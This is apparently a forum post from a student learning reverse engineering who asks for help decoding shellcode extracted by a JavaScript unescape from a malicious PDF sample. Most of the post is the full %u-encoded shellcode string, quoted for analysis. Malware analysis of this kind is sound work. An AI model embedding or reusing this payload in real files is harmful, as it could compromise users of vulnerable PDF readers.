REing shellcode
I'm a bit new to reverse engineering, and I am trying to decode shellcode for a class report. I have a pdf malware sample of encoded shellcode that I got from a javascript unescape and I am not completely sure how to decode it properly. I've tried dynamically analyzing the sample but I think it requires a specific version of Acrobat to run. This is kind of niche but I am kind of lost.
This is what I got from the unescape function. Any help would be appreciated
'%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u3142%u354c%u544c%u4343%u4c49%u3648%u4b49%u434e%u5041%u3842%u5346%u504c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u4742%u544e%u4949%u5949%u3949%u4c43%u4f4d%u534a%u4a49%u3949%u3949%u4949%u3144%u4d49%u4945%u5144%u4e49%u4845%u3346%u5144%u4d49%u5941%u5144%u4441%u4144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u494c%u564c%u3144%u4e47%u4b49%u494c%u4644%u3144%u4d47%u584d%u4a4c%u5746%u4c4f%u4c50%u4c4a%u4144%u4a48%u394c%u5644%u3144%u464b%u4f43%u3947%u4c42%u364c%u434f%u4e4d%u3941%u4c42%u4c48%u314c%u3550%u494d%u4d4e%u374b%u5742%u4c42%u4c48%u4c47%u3144%u4546%u3144%u4d4f%u4b4d%u494c%u454c%u544a%u574a%u394c%u354a%u4a4c%u5542%u4f4f%u3144%u5941%u4144%u4d4f%u4845%u594c%u554c%u354a%u574a%u494b%u494c%u554a%u4144%u3949%u394c%u454c%u5144%u5643%u4144%u3650%u414c%u354f%u5947%u4144%u4449%u4f43%u594d%u4c42%u4741%u4c49%u5949%u3949%u4949%u414c%u554f%u4946%u4c4b%u4c4f%u4648%u4c50%u4645%u4c43%u4144%u3441%u4f43%u494a%u4c42%u5741%u4a46%u4949%u5949%u5949%u514c%u354f%u484c%u4c4f%u4d4f%u5149%u4a47%u5149%u4e4e%u3643%u3149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u4144%u5445%u4f43%u4b49%u4c4c%u4648%u4c50%u5745%u5550%u494d%u594c%u4c45%u4f4a%u4b47%u4f4e%u4550%u4d4d%u394c%u394d%u4e41%u4f4e%u3949%u3949%u4a4c%u4549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u4648%u4c50%u4645%u5144%u3445%u4c49%u4c4c%u3648%u4c50%u3649%u4c49%u3648%u4c50%u564d%u4a4c%u5549%u4345%u314e%u3549%u4e4e%u3642%u4c4a%u4c4b%u4c4f%u4c4c%u3648%u544b%u4c43%u4c42%u5344%u574b%u3747%u4a4c%u4549%u354c%u4741%u4b4f%u4648%u5648%u3648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u4949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u5949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u5949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u3949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u4746%u4742%u334c%u524f%u424f%u3644%u3645%u4743%u364a%u4744%u5641%u3647%u364f%u3743%u4250%u3643%u364f%u364d%u524f%u5747%u464f%u5744%u464b%u424f%u4647%u4645%u5746%u3645%u374a%u4645%u5250%u5742%u464a%u4742%u534f%u364a%u434d%u3343%u3341%u4842%u005a'

I've tried dumping it using peepdf js_unescape, but was not able to get anything super useful in ghidra or attemping to view the strings.
